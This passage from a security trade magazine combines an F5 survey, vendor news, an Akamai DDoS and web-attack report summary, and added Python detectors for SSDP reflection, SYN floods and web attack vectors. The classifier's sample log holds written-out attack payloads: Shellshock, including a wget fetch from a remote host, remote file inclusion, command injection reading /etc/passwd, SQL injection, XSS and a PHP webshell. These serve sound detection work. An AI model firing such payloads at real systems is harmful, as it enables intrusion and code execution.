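    for host, rec in chain_progress(log_text).items():
        dwell = 0
        if rec["first_inside"] is not None:
            dwell = (rec["last_seen"] - rec["first_inside"]).days
        rows.append({
            "host": host,
            "furthest_phase": max(rec["phases"], key=RANK.get),
            "phases_seen": [p for p in PHASES if p in rec["phases"]],
            "dwell_days": dwell,
            "exfiltration": {"command", "action"} <= rec["phases"],
        })
    rows.sort(key=lambda r: (RANK[r["furthest_phase"]], r["dwell_days"]),
              reverse=True)
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(row)
```

On the constructed feed, host-a (delivery through action, 64 days dwell) is ranked first with exfiltration flagged, host-c (installation and command only) second, and the merely scanned host-b last.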
STATE OF APPLICATION DELIVERY IN APAC 2015
Applications have changed our world, and they continue to change business and business strategy. Companies in every industry rely on applications to drive customer engagement, employee productivity and revenue. However, what is less widely studied is the huge range of “app services” that improve apps’ performance and reliability, as well as enhance security. To understand more about the applications that organisations rely on, F5 surveyed 3,266 IT decision makers across Asia about their current and planned use of application services.
Number of applications currently deployed in the company: 1-200 (45%); 201-500 (17%); 501-1,000 (11%); 1,001-3,000 (6%); over 3,001 (13%); I don’t know/other (8%).

Key Findings
Apps are growing in popularity – Organisations are managing enormous numbers of apps already, and they’re critical to the modern fabric of business.
The flexibility of cloud is irresistible – Apps are being moved into the cloud as organisations embrace the “cloud first” philosophy.
App security is now the no. 1 priority – With so much riding on apps, keeping them secure is now the top priority for businesses in Asia.
But progress is slow and challenges exist – From performance issues to reticence to deploy SSL, the path is anything but smooth.

What portion of your apps could you shut down and only a handful of end users would notice? None (33%); All (13%); I don’t know (41%); Other (13%).
Apps are growing in popularity…and this will not stop anytime soon
Applications have changed our world, and are changing the way business is conducted. Almost half (45%) of organisations now deploy 1-200 applications, while almost a fifth (17%) said they deploy 201-500. Applications have become an integral part of business life, with a third of respondents stating they were unable to shut down a single app without someone noticing.
To ensure a flawless service between applications and end users, a great array of application services are being deployed. Surprisingly, in APAC performance plays second fiddle to identity/access, while security is on everyone’s agenda. The majority of organisations have already deployed SSL VPN, while identity federation, application access control, and single sign-on are all earmarked for deployment over the coming year by around a quarter of respondents.
The flexibility of cloud is irresistible
APAC currently lags behind the rest of the world somewhat in terms of cloud adoption in application services. Just 11% of security application services on average are deployed in the cloud, with the vast majority of organisations preferring to keep them on premise. But this is changing as organisations find the lure of cloud irresistible. 41% of respondents said 0-24% of applications could be moved to the cloud by 2016, while almost a quarter estimate it to be 25-50%. A small percentage of respondents (5%) even predicted that up to their entire application portfolio could soon be cloud based.

Expected business applications moved to the cloud by 2016: 0%-24% (41%); 25%-50% (24%); 51%-75% (12%); 76%-100% (5%); I don’t know/other (18%).
What are the emerging trends with strategic importance for your organisation in the next two to five years? [Chart: private cloud 43%; Software as a Service (SaaS) 37%; public cloud services (IaaS) 35%; the other options shown were DevOps, Software Defined Networks (SDN), physical data centre consolidation, mobile applications, virtual desktop, WAN optimisation, IPv6 migration, Internet of Things and big data analytics, whose values could not be recovered from the extracted chart.]

A large proportion (43%) of respondents saw private cloud as having “strategic importance” to their organisation over the next two to five years, with 37% choosing SaaS and 35% also opting for public cloud services (IaaS). This could be driven in part by the rise in “cloud first” strategies across APAC, currently employed by 46% of respondents.
Interestingly, the research also revealed that respondents saw mobile applications and big data analytics as more important trends than the Internet of Things. These findings suggest a growing Hybrid Environment across the region, with a mix of off and online solutions increasingly being adopted by enterprises.
App security is now the no. 1 priority
[Chart: Organisations that plan to deploy or implement security application services within the next 12 months, as percentages split into “Deployed today”, “Will deploy in 12 months” and “No plans to deploy”, for DDoS protection/mitigation, web application firewall, IPS/IDS, anti-virus, anti-fraud, SPAM mitigation, DNSSEC and network firewall.]

With so much momentum behind cloud, security is now inevitably becoming a top priority. Of all the application services, security was by far the most popular in our survey, outranking even availability. Anti-virus and network firewall (72%) led the deployments, with around a quarter of organisations planning to deploy DDoS protection and anti-fraud services in the next 12 months. A further quarter had no plans to deploy DDoS protection at all, suggesting that Asian organisations still do not view this as a significant threat to their business. In fact, 42% of respondents said that the worst thing you could deploy application services without was security. Only 13% chose identity/access services, while a mere 6% saw mobile as a crucial decision.
Top concerns for organisations when deploying applications without…: Security (42%); Availability (30%); Identity/Access (13%); Performance (10%); Mobility (6%).

We also asked our respondents “Which of the following attack surfaces is your organisation protecting: the client, inbound requests, outbound traffic?” Around a quarter of respondents said they protect all three attack surfaces only “sometimes”, an identical finding to organisations in North America when they were asked the same question. Despite more than half claiming to always protect both the client and inbound requests, a staggering 12% of APAC organisations never protect outbound traffic.
But progress is slow and challenges exist
Challenges organisations face when adopting Hybrid Cloud: We don’t have the analytics to understand when it is best to deploy applications in cloud data centres and when it is most cost effective to deploy in our own data centres (35%); We haven’t identified a comprehensive identity and access management policy (29%); We are unable to have consistent application performance across Hybrid Cloud deployments (23%); We are unable to find a cloud provider that meets our data security requirements (21%); We are not adopting a Hybrid Cloud environment (19%); We don’t have any challenges at this time (17%); I don’t know (14%).

But despite this rush to the cloud, the road is not entirely smooth, and challenges do exist. Only 22% of respondents had fully deployed SSL, for example, with a quarter of organisations admitting to having no idea when they would. While Hybrid Clouds are growing in popularity, almost a third (29%) of organisations admit that their slow adoption was down to their failure to identify a comprehensive identity and access management policy. Even more (35%) admitted that they lacked the internal knowledge to know when it is best to deploy publicly or privately.
Just 11% of respondents were very confident that their organisation could withstand an application level security threat. When asked what they would give up to make their network more secure, 25% said network appliance device consolidation and a similar number said network programmability options, while just 6% said availability, suggesting that meeting customer expectations is a big priority.
Conclusion
The evidence of this survey indicates that organisations in APAC are aware of the importance of application services and rely heavily on them to maintain service quality levels. As application deployments expand beyond the data centre to include public, private and hybrid cloud models, the complexity and diversity of application services will evolve fast. But the success of this strategy – which seems to be gathering pace over the next 12-24 months – relies heavily on the effectiveness of the security infrastructure that is deployed concurrently.
Solutions for an application world. @F5NetworksAPJ | F5NetworksAP | F5-Networks
©2015 F5 Networks, Inc. All rights reserved. F5, F5 Networks, and the F5 logo are trademarks of F5 Networks, Inc. in the US and in certain other countries. Other F5 trademarks are identified at f5.com. Any other products, services, or company names referenced herein may be trademarks of their respective owners with no endorsement or affiliation, express or implied, claimed by F5. CS01-2029
Video: See Siveillance Vantage in action – www.siemens.com.au/bt-security
Siveillance™ Vantage secures your critical infrastructure
Siveillance™ Vantage is a command and control workflow engine, specifically designed to support security management for critical infrastructure. Using innovative software, Siveillance Vantage not only ties together all the sub-systems currently used to protect and manage your site, but it also allows you to customise and integrate security policies and procedures using workflows and automated actions.
Siveillance Vantage offers the desired level of security and provides peace of mind at any time for:
• Airports and ports
• Correctional facilities
• Government assets
• Campuses
• Energy infrastructure assets
For more information, contact us on 13 72 22 or visit our website www.siemens.com.au/bt-security
www.siemens.com.au
Within TechTime you will find the very latest information, news and products from a wide variety of security industries, ranging from cameras, computers, software and hardware.
To have your company news or latest products featured in our TechTime section, please email promoteme@australiansecuritymagazine.com.au
Latest News and Products
TechTime - latest news and products
Honeywell Digital Video Manager helps improve operator efficiency and mitigate business risk
The latest release of the smart surveillance software boosts reliability and enhances operator efficiency with mobile and voice control. Honeywell has announced enhancements to Honeywell Digital Video Manager (DVM). The latest release, DVM R600, enables organisations to manage their security system more efficiently with enhanced mobile capabilities and voice command, and to mitigate business risk through support for current IT platforms.
Major updates to DVM include enhanced system access and usability, designed to improve operator efficiency and reaction time. Security personnel can now access high-definition, full-frame-rate video on a mobile device, enabling continuous monitoring from almost any location. Operators can also control DVM using voice commands to manage multiple video feeds more easily and to request near-real-time system updates.
“Every second is important to an organisation when an incident occurs and security staff must take immediate action if there is a threat,” said John Rajchert, president of Honeywell Building Solutions. “The latest update to DVM helps operators quickly identify and react to an issue to help mitigate the impact to safety and business continuity — no matter if they are in front of a central workstation or on the opposite side of a campus, connected with a smartphone.”
Along with an improved user experience, DVM R600 promotes IT integration and compliance with support for current Microsoft operating systems and databases, including Windows Server 2012, Windows 8.1, Internet Explorer 11 and SQL Server 2014. Windows Server 2003 is not recommended: Microsoft ended extended support for it on 14 July 2015, so a security system still running on that platform receives no further security updates and remains exposed to any vulnerability found in it from now on.
In addition, DVM R600 allows customers to deploy and intelligently group multiple back-up servers to boost system robustness, which helps protect surveillance systems from failures. Other DVM upgrades focus on:
• Speeding data collection: security operators can export footage from multiple camera feeds in unison to streamline incident response and workflow, and quickly collect and archive forensic data in the event of an incident.
• Reducing storage requirements: dynamic recording enables the system to capture critical video at higher frame rates while collecting less important footage at lower frame rates, trimming storage requirements and costs by up to 40 percent.
“Our surveillance system has always been robust, utilising hundreds of cameras throughout both our facilities to promote visitor safety and security,” said Tom Owen, operations manager for Brookfield Global Integrated Solutions, which manages the Melbourne Convention and Exhibition Centre in Australia. “However, the IT infrastructure required large storage capacity and as many as 15 standalone PC servers. We have cut our costs significantly with DVM R600 by using the system’s single-server virtual machine environment, and intelligent redundancy of storage, processing and memory. The new architecture has also helped lower life-cycle and maintenance costs.”
DVM is a component of Honeywell Enterprise Buildings Integrator (EBI), an award-winning building management system that ties all aspects of a security solution together, including video surveillance, access control and intrusion detection. EBI also integrates comfort, life safety, energy and other core facility controls, giving users a single point of access to the essential information and resources needed to monitor, manage and protect a facility, campus or multi-site operation. As a result, security operators have optimised visibility and intelligence, and the ability to deploy their staff and resources more efficiently and effectively. For more information, visit buildingsolutions.honeywell.com, follow HoneywellBuild on Twitter and join the Honeywell Connected Buildings group on LinkedIn. Honeywell (www.honeywell.com) is a Fortune 100 diversified technology and manufacturing leader, serving customers worldwide with aerospace products and services; control technologies for buildings, homes and industry; turbochargers; and performance materials. For more news and information on Honeywell, please visit www.honeywellnow.com
Information presented in TechTime is provided by the relevant advertiser and are not necessarily the views of My Security Media
Zaplox mobile key services integrated with SALTO hospitality access control solution
A global provider of advanced access control systems has integrated with Zaplox’ streamlined, cloud-based Mobile Key Services. Zaplox has integrated its solution with SALTO Systems, providing hotels and their guests with greater convenience and satisfaction, and is the first Mobile Key Services company to announce an integration with SALTO Systems. The partnership allows any property with SALTO BLE (Bluetooth Low Energy) enabled locks installed to implement mobile access for its guests, together with the operational benefits that Zaplox Mobile Key Services provide.
Through the integration, guests of properties with SALTO access control systems can use their smartphones for guestroom access, while hoteliers can offer and promote revenue-creating smart services with full customisation and hotel branding on the Zaplox Mobile Key Services app platform. The ancillary services that can be made available in the app include mobile check-in and checkout, room upgrades, restaurant bookings, room service, special offers and more. The Zaplox Mobile Key Services app is easily downloaded and available for all major smartphone platforms. With recent industry research indicating that more than 70 percent of travellers would opt to use their smartphones as a check-in alternative, Zaplox Mobile Key Services allow guests to bypass the front desk altogether, saving them time. Mobile keys also improve on plastic keycards in two respects: a guest’s smartphone is less likely to be misplaced than a keycard and is typically protected by a passcode, and should a guest lose their phone, hotel staff can revoke and reassign the mobile key in real time.
In less than 10 years, SALTO has become one of the world’s top five manufacturers of electronic access control systems. SALTO has a strong tradition of delivering the latest in guestroom access technology and has launched a series of innovations since its founding, raising the bar for guestroom security. By combining SALTO smart locks with Zaplox Mobile Key Services, hotels benefit from cost efficiencies through streamlined operations and new revenue opportunities, allowing front desk staff to focus on other aspects of guest service and communication.
“We are thrilled to serve as the first mobile key app provider for SALTO Systems, as a result providing the company and its clients with an integration-ready solution that is instantly available for commercialisation around the globe,” says Magnus Friberg, CEO at Zaplox. “This is a very important collaboration for Zaplox, since it opens up new market possibilities together with an industry-renowned partner. We strongly believe that mobile keys and the additional services included will improve both guest loyalty and enhance the guest experience by making it smooth and comfortable.”
“Research shows guest demand for the use of smartphones and apps as part of their hotel experience is increasing,” says Jennifer Stack, Vice President Marketing, SALTO Systems. “So this integration with Zaplox is perfectly placed to deliver an exciting range of benefits, enabling them to enjoy all the advantages provided by integrated smart technology to maximise the flexibility and enjoyment of their hotel stay.”
For more information on how Zaplox and SALTO Systems are revolutionising mobile key services for hotels, please visit www.zaplox.com or www.saltosystems.com
About SALTO Systems
We’re driven by innovation. Guided by our insights into customer needs, we deliver industry-leading, next-generation electronic locking solutions without wires and without mechanical keys. Since 2001, SALTO has been redefining the access control world by continually being first to anticipate market needs in a rapidly evolving marketplace. We set new standards in security, manageability and scalability. SALTO’s pioneering SVN platform provides stand-alone networked locking solutions. With its online and real-time technology, our market-leading XS4 platform enhances the usability of every building environment by securing virtually every door and enabling the monitoring and control of every user. SALTO hardware and software can be networked without wires to provide real-time intelligence and instant control, whilst enabling integration with existing systems to improve manageability and enhance the end-user experience. Having revolutionised access control around the world in sectors where security is critical, from airports and healthcare to government, education and hotels, we continue to deliver the most advanced and flexible electronic locking solutions in the market.
About Zaplox
Zaplox operates globally, offering hotels and other commercial facilities efficient and secure mobile key services for opening doors with smartphones, in combination with revenue-making services, all in one app and service platform. It is easy to use and works on all major smartphones, on both Apple and Android platforms. The Zaplox solution can support major locks, hotel systems and access systems, and can replace or coexist with key cards, code locks and physical keys. Zaplox was founded in 2010 in Ideon Science Park, Lund, Sweden, and is established in Europe and North America. For more information, please visit www.zaplox.com
Cyber TechTime - latest news and products
Akamai Q2 2015 State of the Internet – Security Report
The number of DDoS attacks has more than doubled compared to Q2 2014, and mega-attacks are on the rise. An aggressive, multi-week Shellshock application attack targeting a single customer was responsible for 49% of web application attack alerts in Q2 2015. Akamai researchers uncovered 49 new WordPress plug-in and theme vulnerabilities.
Akamai Technologies, Inc., has announced the availability of the Q2 2015 State of the Internet – Security Report. This quarter’s report, which provides analysis and insight into the global cloud security threat landscape, can be downloaded at www.stateoftheinternet.com/security-report.
“The threat posed by distributed denial of service (DDoS) and web application attacks continues to grow each quarter,” said John Summers, vice president, Cloud Security Business Unit, Akamai. “Malicious actors are continually changing the game by switching tactics, seeking out new vulnerabilities and even bringing back old techniques that were considered outdated. By analysing the attacks observed over our networks, we’re able to identify emerging threats and trends and provide the public with the information to harden their networks, websites and applications and improve their cloud security profiles. For example, for this report, we not only added two web application attack vectors to our analysis, we also examined the perceived threat posed by the onion router (Tor) traffic and even uncovered some new vulnerabilities in third-party WordPress plugins which are being published as CVEs,” he said. “The more you know about cyber security threats, the better you can defend your enterprise.”
DDoS attack activity at a glance
For the past three quarters, the number of DDoS attacks has doubled year over year. And while attackers favoured less powerful but longer-duration attacks this quarter, the number of dangerous mega-attacks continues to increase.
In Q2 2015, there were 12 attacks peaking at more than 100 gigabits per second (Gbps) and five attacks peaking at more than 50 million packets per second (Mpps). Very few organisations have the capacity to withstand such attacks on their own. The largest DDoS attack of Q2 2015 measured more than 240 Gbps and persisted for more than 13 hours; peak bandwidth is typically confined to a one- to two-hour window. Q2 2015 also saw one of the highest packet-rate attacks ever recorded across the Prolexic Routed network, which peaked at 214 Mpps. A packet rate of that order is capable of taking out tier 1 routers, such as those used by Internet service providers (ISPs).
DDoS attack activity set a new record in Q2 2015, increasing 132% compared to Q2 2014 and 7% compared to Q1 2015. Average peak attack bandwidth and volume increased slightly in Q2 2015 compared to Q1 2015, but remained significantly lower than the peak averages observed in Q2 2014. SYN and Simple Service Discovery Protocol (SSDP) were the most common DDoS attack vectors this quarter, each accounting for approximately 16% of DDoS attack traffic. The proliferation of unsecured home-based, Internet-connected devices using the Universal Plug and Play (UPnP) protocol continues to make them attractive as SSDP reflectors: the attacker sends SSDP discovery requests with the victim’s address forged as the source, and every exposed device delivers its reply to the victim. Practically unseen a year ago, SSDP attacks have been one of the top attack vectors for the past three quarters. SYN floods have continued to be one of the most common vectors in all volumetric attacks, dating back to the first edition of the security reports in Q3 2011. Online gaming has remained the most targeted industry since Q2 2014, consistently being targeted in about 35 percent of DDoS attacks. China has remained the top source of non-spoofed attack traffic for the past two quarters, and has been among the top three source countries since the very first report was issued in Q3 2011.
At a glance, compared to Q2 2014:
• 132.43% increase in total DDoS attacks
• 122.22% increase in application layer (Layer 7) DDoS attacks
• 133.66% increase in infrastructure layer (Layer 3 & 4) attacks
• 18.99% increase in the average attack duration: 20.64 vs. 17.35 hours
• 11.47% decrease in average peak bandwidth
• 77.26% decrease in average peak volume
• 100% increase in attacks > 100 Gbps: 12 vs. 6
Compared to Q1 2015:
• 7.13% increase in total DDoS attacks
• 17.65% increase in application layer (Layer 7) DDoS attacks
• 6.04% increase in infrastructure layer (Layer 3 & 4) attacks
• 16.85% decrease in the average attack duration: 20.64 vs. 24.82 hours
• 15.46% increase in average peak bandwidth
• 23.98% increase in average peak volume
• 50% increase in attacks > 100 Gbps: 12 vs. 8
• As in Q1 2015, China was the quarter’s top source country for DDoS attacks
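The two vectors the report singles out, SSDP reflection and SYN floods, both show up in ordinary flow records at the victim's edge with a distinctive shape: many distinct sources, udp/1900 as the source port for SSDP replies the victim never solicited, and SYN-only TCP flows that never complete a handshake. The following Python is an added example written for this article, not code from Akamai or the report; the flow records it classifies are constructed, and the two thresholds (REFLECTOR_THRESHOLD, SYN_SOURCE_THRESHOLD) are assumptions a deployment would tune to its own baseline.

```python
"""Flag SSDP reflection and SYN-flood traffic in flow records.

Added example for this article, not code from the Akamai report. The flow
records are constructed and the two thresholds are assumptions.
"""
import random
from collections import defaultdict

UDP, TCP = 17, 6
SSDP_PORT = 1900            # UPnP discovery (SSDP) replies are sent from udp/1900
REFLECTOR_THRESHOLD = 50    # assumption: distinct SSDP responders before we call it reflection
SYN_SOURCE_THRESHOLD = 100  # assumption: distinct SYN-only sources before we call it a SYN flood


def sample_flows(seed=1):
    """Constructed NetFlow-style records as seen at the victim's network edge.

    Each record is (src_ip, src_port, dst_ip, dst_port, proto, tcp_flags, packets, bytes).
    """
    rng = random.Random(seed)
    victim = "203.0.113.10"
    flows = []
    # SSDP reflection: the attacker sends M-SEARCH requests with the victim's
    # address as the spoofed source, so every Internet-exposed UPnP device sends
    # its ~300-byte reply to the victim from udp/1900. The victim never asked.
    for i in range(200):
        pkts = rng.randint(3, 8)
        flows.append((f"198.51.100.{i + 1}", SSDP_PORT, victim,
                      rng.randint(1024, 65535), UDP, "", pkts, pkts * 300))
    # SYN flood: 300 spoofed sources send 60-byte SYNs and never complete the handshake.
    for i in range(300):
        pkts = rng.randint(10, 40)
        flows.append((f"100.64.{i // 256}.{i % 256}", rng.randint(1024, 65535), victim,
                      80, TCP, "S", pkts, pkts * 60))
    # Ordinary web traffic: completed handshakes with data flowing (SYN, PSH and ACK seen).
    for i in range(20):
        flows.append((f"192.0.2.{i + 1}", rng.randint(1024, 65535), victim,
                      443, TCP, "SPA", 40, 24000))
    # A single genuine SSDP reply on the LAN: below threshold, must not fire.
    flows.append(("10.0.0.5", SSDP_PORT, "10.0.0.9", 50000, UDP, "", 1, 300))
    rng.shuffle(flows)
    return flows


def classify_flows(flows, reflector_threshold=REFLECTOR_THRESHOLD,
                   syn_threshold=SYN_SOURCE_THRESHOLD):
    """Group flows per destination and report the DDoS vectors hitting each one.

    Returns {dst_ip: {vector: {"sources": n, "bytes": b, "share": fraction}}}, where
    "share" is the vector's fraction of attack bytes at that destination, the same
    per-vector split the report quotes (SYN and SSDP at ~16% each).
    """
    per_dst = defaultdict(lambda: {"ssdp": set(), "ssdp_bytes": 0,
                                   "syn": set(), "syn_bytes": 0})
    for src_ip, src_port, dst_ip, _dst_port, proto, flags, _pkts, nbytes in flows:
        st = per_dst[dst_ip]
        if proto == UDP and src_port == SSDP_PORT:
            st["ssdp"].add(src_ip)
            st["ssdp_bytes"] += nbytes
        elif proto == TCP and flags == "S":       # SYN alone: handshake never completed
            st["syn"].add(src_ip)
            st["syn_bytes"] += nbytes

    findings = {}
    for dst, st in per_dst.items():
        vectors = {}
        if len(st["ssdp"]) >= reflector_threshold:
            vectors["ssdp_reflection"] = {"sources": len(st["ssdp"]), "bytes": st["ssdp_bytes"]}
        if len(st["syn"]) >= syn_threshold:
            vectors["syn_flood"] = {"sources": len(st["syn"]), "bytes": st["syn_bytes"]}
        if vectors:
            attack_bytes = sum(v["bytes"] for v in vectors.values())
            for v in vectors.values():
                v["share"] = v["bytes"] / attack_bytes
            findings[dst] = vectors
    return findings


if __name__ == "__main__":
    for dst, vectors in classify_flows(sample_flows()).items():
        for name, v in vectors.items():
            print(f"{dst}: {name} from {v['sources']} sources, {v['share']:.0%} of attack bytes")
```

The SSDP check needs no tuning in practice: a public server has no reason to receive udp/1900 from the Internet, so that traffic can be dropped at the edge outright, and the devices doing the reflecting are fixed by not exposing UPnP on the WAN side. The SYN case is the one where the threshold matters, and where SYN cookies on the target keep the connection table from filling while the flood is being rerouted.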
Web application attack activity
Akamai first began reporting web application attack statistics in Q1 2015. This quarter, two additional attack vectors were analysed: Shellshock and cross-site scripting (XSS). Shellshock, the Bash vulnerability (CVE-2014-6271) first tracked in September 2014, was leveraged in 49% of the web application attacks this quarter. However, 95% of the Shellshock attacks targeted a single customer in the financial services industry, in an aggressive, persistent attack campaign that endured for the first several weeks of the quarter. Since Shellshock attacks typically occur over HTTPS, this campaign shifted the balance of attacks over HTTPS vs. HTTP: in Q1 2015, only 9% of attacks were over HTTPS; this quarter 56% were over HTTPS channels.
Looking beyond Shellshock, SQL injection (SQLi) attacks accounted for 26% of all attacks, representing a greater than 75% increase in SQLi alerts in the second quarter alone. In contrast, local file inclusion (LFI) attacks dropped significantly this quarter: while it was the top web application attack vector in Q1 2015, LFI only accounted for 18% of alerts in Q2 2015. Remote file inclusion (RFI), PHP injection (PHPi), command injection (CMDi), Java injection via the OGNL expression language (JAVAi) and malicious file upload (MFU) attacks combined accounted for 7% of web application attacks.
The analysis showed that 99% of the attacks were sourced from non-Tor IPs. However, 1 out of 380 requests from Tor exit nodes was malicious, against only 1 out of 11,500 requests from non-Tor IPs. Blocking Tor traffic outright could still have a negative business effect: legitimate HTTP requests to e-commerce related pages showed that Tor exit nodes had conversion rates on par with non-Tor IPs.
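The per-vector percentages above come from classifying each alert by the vector its request matched. The following Python is an added example written for this article, not Akamai's code or detection logic; it classifies constructed access-log lines (in a simplified layout of timestamp, scheme, client, request and User-Agent, not Apache's combined format) into the vectors the report names and computes the same two summaries the report gives: share of alerts per vector and the fraction carried over HTTPS. The patterns are deliberately short illustrations of each vector, not a production ruleset.

```python
"""Classify web application attack alerts by vector from access-log lines.

Added example for this article, not Akamai's code. SAMPLE_LOG is constructed;
the line layout is: <timestamp> <scheme> <client-ip> "<METHOD> <target>" "<User-Agent>".
"""
import re
from collections import Counter
from urllib.parse import unquote

LINE_RE = re.compile(r'^(\S+) (https?) (\S+) "([A-Z]+) ([^"]*)" "([^"]*)"$')

# Ordered: first match wins. Order matters because one request can satisfy
# several patterns (a command injection that cats /etc/passwd would otherwise
# be counted as LFI).
VECTORS = [
    ("shellshock", re.compile(r"\(\)\s*\{")),                           # bash function prefix "() {"
    ("cmdi", re.compile(r"[;|`]\s*[A-Za-z/]|\$\(")),                     # shell separator then a command, or $(...)
    ("rfi", re.compile(r"=\s*(?:https?|ftp)://", re.I)),                # parameter pointing at a remote file
    ("sqli", re.compile(r"union\s+select|'\s*or\s+'?\d*'?\s*=|'--", re.I)),
    ("lfi", re.compile(r"\.\./|/etc/passwd|/proc/self/", re.I)),        # traversal / local file read
    ("xss", re.compile(r"<\s*script|javascript:|onerror\s*=|onload\s*=", re.I)),
    ("phpi", re.compile(r"<\?php|php://", re.I)),
]
SHELLSHOCK = VECTORS[0][1]

SAMPLE_LOG = """\
2015-04-03T10:00:01Z https 198.51.100.7 "GET /cgi-bin/status.sh" "() { :;}; /bin/bash -c 'id'"
2015-04-03T10:00:02Z https 198.51.100.7 "GET /cgi-bin/test.cgi" "() { :;}; /usr/bin/wget http://203.0.113.5/x -O /tmp/x"
2015-04-03T10:00:03Z http 203.0.113.44 "GET /products.php?id=1' OR '1'='1" "Mozilla/5.0"
2015-04-03T10:00:04Z http 203.0.113.44 "GET /login.php?user=admin'--" "Mozilla/5.0"
2015-04-03T10:00:05Z http 192.0.2.9 "GET /view.php?page=../../../../etc/passwd" "Mozilla/5.0"
2015-04-03T10:00:06Z http 192.0.2.9 "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd" "Mozilla/5.0"
2015-04-03T10:00:07Z http 192.0.2.9 "GET /include.php?file=http://203.0.113.5/shell.txt" "Mozilla/5.0"
2015-04-03T10:00:08Z http 198.51.100.23 "GET /search?q=<script>alert(1)</script>" "Mozilla/5.0"
2015-04-03T10:00:09Z http 198.51.100.23 "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E" "Mozilla/5.0"
2015-04-03T10:00:10Z https 198.51.100.23 "GET /ping.php?host=127.0.0.1;cat /etc/passwd" "curl/7.38.0"
2015-04-03T10:00:11Z http 198.51.100.23 "GET /api.php?data=<?php system($_GET['c']); ?>" "Mozilla/5.0"
2015-04-03T10:00:12Z https 192.0.2.50 "GET /index.html" "Mozilla/5.0 (Windows NT 6.1; WOW64)"
2015-04-03T10:00:13Z http 192.0.2.50 "GET /products.php?id=42" "Mozilla/5.0 (Windows NT 6.1; WOW64)"
2015-04-03T10:00:14Z http 192.0.2.50 "GET /search?q=shellshock+patch" "Mozilla/5.0 (Windows NT 6.1; WOW64)"
"""


def classify(target, user_agent):
    """Return the attack vector for one request, or None if it looks benign."""
    decoded = unquote(target)           # payloads arrive URL-encoded; match the decoded form
    for name, pattern in VECTORS:
        if pattern.search(decoded):
            return name
    # Headers are checked only for the Shellshock prefix: "() {" never occurs in a
    # legitimate header, whereas ';' and quotes are routine in User-Agent strings
    # and would turn every Windows browser into a CMDi alert.
    if SHELLSHOCK.search(user_agent):
        return "shellshock"
    return None


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ts, scheme, client, method, target, ua = m.groups()
    return {"ts": ts, "scheme": scheme, "client": client,
            "method": method, "target": target, "ua": ua}


def summarise(lines):
    """Count alerts per vector and the fraction of alerts carried over HTTPS."""
    by_vector, https_alerts, total = Counter(), 0, 0
    for line in lines:
        rec = parse_line(line)
        vec = classify(rec["target"], rec["ua"])
        if vec is None:
            continue
        by_vector[vec] += 1
        total += 1
        if rec["scheme"] == "https":
            https_alerts += 1
    shares = {v: n / total for v, n in by_vector.items()} if total else {}
    return {"alerts": total, "by_vector": dict(by_vector), "shares": shares,
            "https_share": https_alerts / total if total else 0.0}


if __name__ == "__main__":
    s = summarise(SAMPLE_LOG.splitlines())
    for v, share in sorted(s["shares"].items(), key=lambda kv: -kv[1]):
        print(f"{v:10s} {share:5.0%}")
    print(f"over HTTPS: {s['https_share']:.0%} of {s['alerts']} alerts")
```

Two things in this layout mirror the report's findings. The scheme column is what lets the HTTPS share be computed at all: an attack carried inside a TLS session is invisible to a network sensor unless the logging happens after termination, which is why the Shellshock campaign moved the HTTPS share from 9% to 56%. And the User-Agent check is restricted to the Shellshock prefix for a reason: the same shell metacharacters that identify command injection in a query string appear in every Windows browser's User-Agent, so pattern-matching headers as freely as parameters would bury the real alerts.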
26 - 28 April 2016 | Sands Convention and Exhibition Centre, Singapore
AUSTRALIA AND NZ PAVILION
LIMITED SPACE AVAILABLE
Back in its third year, SMART Facilities Management Solutions is the region’s most comprehensive trade event servicing the facilities management industry. SMART FMSE 2016 provides an arena for suppliers, end users and professionals to network, exchange knowledge, share best practices and stay updated on the latest industry needs for future readiness, advice on all aspects of the aftercare and maintenance of facilities, and background in design and construction for better integration.
PREMIUM EXHIBITION SPACES AVAILABLE!
My Security Media, in partnership with the SMART Facilities Management Expo, is pleased to offer you prime exhibition space at next year’s event. This dedicated pavilion space is specifically for Australian and New Zealand companies. If you wish to participate and exhibit at a prominent international security event, this is your opportunity. The space is available as a whole (120m²) or as 10 pavilion booths (12m² each), whatever you require. As an exhibitor you will obtain more than just visibility during the Expo:
• Increased brand awareness and recall
• The opportunity to leverage pre- and post-event media coverage with My Security Media
• Be part of the print and online campaigns in our magazines and trade publications
• Be part of our public relations campaigns through press conferences, gaining press coverage through our strong relations with local and regional media
Please call or email us to book your space at this exclusive event: 08 6361 1786 | promoteme@australiansecuritymagazine.com.au
WHITE PAPER PICKS
NUIX WHITE PAPER
PROTECTING CRITICAL-VALUE DATA FROM THE INSIDE: Designing and implementing an insider threat program
by Keith Lowry and the Nuix Business Threat Intelligence and Analysis Team
NUIX WHITE PAPER
INFORMATION GOVERNANCE: Building business value from dark data
Using powerful new technologies and defensible processes, information managers can comprehensively search, understand and govern the vast volumes of unknown, unstructured data their organisations store. This reduces storage, eDiscovery and investigation costs, fixes records management shortcomings, de-risks organisations and opens up new sources of business value.
www.nuix.com
This first white paper by the Nuix Business Threat Intelligence and Analysis Team explains how your organisation can develop a proactive insider threat mitigation program that combines three key elements:
• Understand and Focus
• Protect and Disrupt
• Deter and Detect
More than one-third of all cybercrime incidents and security breaches are caused by insiders. Insiders have many motivations, including financial, political or emotional. But whatever the reason, insiders inappropriately access an organisation’s critical-value data. For example, in May 2015, the US Justice Department filed charges against six Chinese nationals who had taken jobs at Silicon Valley microelectronics companies to steal trade secrets relating to acoustic filters for mobile telephones. They used this stolen technology to produce their own filter circuits, which they sold to military and commercial customers in China. Although there are few publicly known examples of insider breaches in Australia, it does not necessarily follow that such events are uncommon. Australia has no mandatory data breach notification laws, so it is likely many incidents go unreported. Organisations can become more proactive by broadening the scope of cybersecurity activities from traditional perimeter defences to a set of policies and processes that limit opportunities for insider breaches and make it easier to identify threat actors. The focus is on mitigating insider threats by quickly and efficiently answering the question of who within the network intends to do us harm, and on combining the ‘understand and focus’, ‘protect and disrupt’ and ‘deter and detect’ elements to create an organisation-wide environment focused on defending against insider threats.
INFORMATION GOVERNANCE: Building business value from dark data
Data means different things to different groups within an organisation.
• Content creators see data in the context of productivity. They want to generate material quickly and re-use it where they can, so they can generate revenue or save costs.
• Executives’ main concern is making shareholders and other stakeholders happy by reducing costs, increasing profit margins and keeping the organisation safe.
• Compliance officers, legal and records managers, aim to protect the business. Their main concern is, if something goes wrong, how they can demonstrably put it right.
